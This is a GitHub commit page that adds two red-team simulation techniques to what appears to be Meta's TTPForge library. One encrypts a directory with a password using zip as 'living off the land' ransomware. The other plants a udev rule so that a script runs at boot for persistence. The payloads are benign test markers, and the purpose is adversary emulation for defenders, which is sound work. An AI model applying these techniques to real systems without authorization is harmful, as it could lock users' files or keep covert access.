Impact and persistence TTPs (#129)

Summary: # Proposed Changes Adding TTP's for general use! - TTP1: Impact related LOTL Ransomware on Linux utilizing zip - TTP2: Persistence based technique on Linux by loading UDEV rules. ## Related Issue(s) N/A ## Testing Ran the TTPs on Ubuntu 22.04, 20.04 and Latest Kali Linux 8/27/24 ## Documentation Documentation for usage and requirements in the format provided by Meta included. ## Checklist - [x] Ran `mage runprecommit` locally and fixed any issues that arose. - [x] Curated your commit(s) so they are legible and easy to read and understand. - [x] 🚀 Pull Request resolved: #129 Reviewed By: nicolagiacchetta Differential Revision: D62898500 Pulled By: d0n601 fbshipit-source-id: 4b15ed59e64adbd55d9745f4fa799ac2732fc1b3
facebookincubator · Sep 19, 2024 · 09a0e3f · 09a0e3f
1 parent 305a87c
commit 09a0e3f
Show file tree

Hide file tree

Showing 4 changed files with 181 additions and 0 deletions.
diff --git a/ttps/impact/lotl-ransomware/README.md b/ttps/impact/lotl-ransomware/README.md
@@ -0,0 +1,51 @@
+# LOTL Ransomware Encryption
+
+![Meta TTP](https://img.shields.io/badge/Meta_TTP-red)
+
+This TTP leverages the `zip` command available on Linux systems to encrypt files in a specified directory, simulating a ransomware attack using tools already present on the machine. The command encrypts the contents of the target directory and requires a password for decryption, illustrating a data encryption impact scenario often used by threat actors.
+
+## Arguments
+
+- **target_dir**: The directory to encrypt.
+
+  Default: /dev/shm
+
+- **encryption_key**: The password used to encrypt the directory.
+
+  Default: password
+
+## Requirements
+
+1. Access to a Linux system where the `zip` and `unzip` commands are available.
+2. Permission to modify files within the target directory.
+
+## Examples
+
+You can run the TTP using the following command (adjust arguments as needed):
+
+```bash
+ttpforge run forgearmory//impact/ltol-ransomware/lotl-ransomware.yaml \
+    --arg target_dir="/path/to/target/dir" \
+    --arg encryption_key="your_encryption_key"
+```
+
+## Steps
+
+1. **encrypt_dir**: Encrypts the specified directory using the provided encryption key. The directory is compressed into a zip file, which is encrypted with the password.
+
+   ```bash
+   zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }}
+   ```
+
+1. **cleanup**: Attempts to restore the original state by decrypting and unzipping the encrypted directory.
+
+   ```bash
+   unzip -o -P {{ .Args.encryption_key }} ttpforge.zip
+   ```
+
+## MITRE ATT&CK Mapping
+
+- **Tactics**:
+  - TA0040 Impact
+- **Techniques**:
+  - T1486 Data Encrypted for Impact
diff --git a/ttps/impact/lotl-ransomware/lotl-ransomware.yaml b/ttps/impact/lotl-ransomware/lotl-ransomware.yaml
@@ -0,0 +1,34 @@
+---
+api_version: 2.0
+uuid: 0fc4bb3a-b864-4c33-8516-9b0654324ad9
+name: "LOTL Ransomware"
+description: |
+  "Threat actors often need to utilize tools that are prexisting on the machine in order to perform TTPs. Often times threat actors are able to utilize something as simple as the `zip` command in order to encrypt files on a machine."
+
+args:
+  - name: target_dir
+    decription: The directory which we will encrypt.
+    default: /dev/shm
+  - name: encryption_key
+    description: The key which we will use to encrypt the data with.
+    default: password
+
+requirements:
+  platforms:
+    - os: linux
+
+mitre:
+  tactics:
+    - "TA0040 Impact"
+  techniques:
+    - "T1486 Data Encrypted for Impact"
+
+steps:
+  - name: encrypt_dir
+    description: Encrypt provided directory
+    inline: |
+      zip -r -P {{ .Args.encryption_key }} ttpforge.zip {{ .Args.target_dir }}
+
+    cleanup:
+      inline: |
+        unzip -o -P {{ .Args.encryption_key }} ttpforge.zip
diff --git a/ttps/persistence/linux/udev-persistence/README.md b/ttps/persistence/linux/udev-persistence/README.md
@@ -0,0 +1,58 @@
+# UDEV Persistence Technique
+
+![Meta TTP](https://img.shields.io/badge/Meta_TTP-red)
+
+This TTP utilizes a method of establishing persistence by creating a script that is automatically executed at boot time when the `/dev/random` device is loaded. It leverages udev rules to execute the script, making this an effective technique for maintaining access during system initialization.
+
+## Arguments
+
+- **target_path**: The path where the script and udev rule will be created.
+
+  Default: /dev
+
+## Requirements
+
+1. Access to a Linux system with permissions to modify udev rules.
+1. Ability to write files in critical system directories.
+
+## Examples
+
+You can run the TTP using the following command (adjust arguments as needed):
+
+```bash
+ttpforge run forgearmory//persistence/unix/udev-persistence/udev-persistence.yaml \
+    --arg target_path="/your/custom/path"
+```
+
+## Steps
+
+1. **create_persistence_script**: Creates a script in the specified path that will be executed upon system boot.
+
+   ```bash
+   #!/bin/bash
+   echo "touch /root/exploited" > {{ .Args.target_path }}/udev.sh
+   chmod 0600 {{ .Args.target_path }}/udev.sh
+   ```
+
+1. **add_udev_rule**: Adds a udev rule that triggers the script execution when the `/dev/random` device is loaded at boot time.
+
+   ```bash
+   echo 'ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'"' > /etc/udev/rules.d/75-persistence.rules
+   ```
+
+## Cleanup
+
+1. **remove_udev_rule**: Deletes the udev rule from the system.
+
+   ```bash
+   rm /etc/udev/rules.d/75-persistence.rules
+   ```
+
+## MITRE ATT&CK Mapping
+
+- **Tactics**:
+  - TA0003 Persistence
+- **Techniques**:
+  - T1546 Event Triggered Execution
+- **Subtechniques**:
+  - T1546.004 Unix Shell Configuration Modification
diff --git a/ttps/persistence/linux/udev-persistence/udev-persistence.yaml b/ttps/persistence/linux/udev-persistence/udev-persistence.yaml
@@ -0,0 +1,38 @@
+---
+api_version: 2.0
+uuid: 96c74a6e-ecec-4559-846e-8027e1612a33
+name: "UDEV Persistence Technique"
+description: |
+  "This technique creates a script that is executed when the /dev/random device is loaded, which is typically at boot time. This method uses udev rules to achieve persistence by triggering the script execution during system initialization, establishing a low-level method for maintaining access."
+
+args:
+  - name: target_path
+    description: The path where the script and udev rule will be created.
+    default: /dev
+
+requirements:
+  platforms:
+    - os: linux
+
+mitre:
+  tactics:
+    - "TA0003 Persistence"
+  techniques:
+    - "T1546 Event Triggered Execution"
+  subtechniques:
+    - "T1546.004 Event Triggered Execution: Unix Shell Configuration Modification"
+steps:
+  - name: create_persistence_script
+    decription: Create the script that will be executed at boot.
+    create_file: {{ .Args.target_path }}/udev.sh
+    contents:
+      touch /root/exploited
+    mode: 0600
+    cleanup: default
+
+  - name: add_udev_rule
+    description: Add a udev rule to trigger the script at boot when /dev/random is loaded.
+    create_file: "/etc/udev/rules.d/75-persistence.rules"
+    contents: ACTION=="add", ENV{MAJOR}=="1", ENV{MINOR}=="8", RUN+="/bin/sh -c '{{ .Args.target_path }}/udev.sh'"
+    cleanup:
+      remove_path: "/etc/udev/rules.d/75-persistence.rules"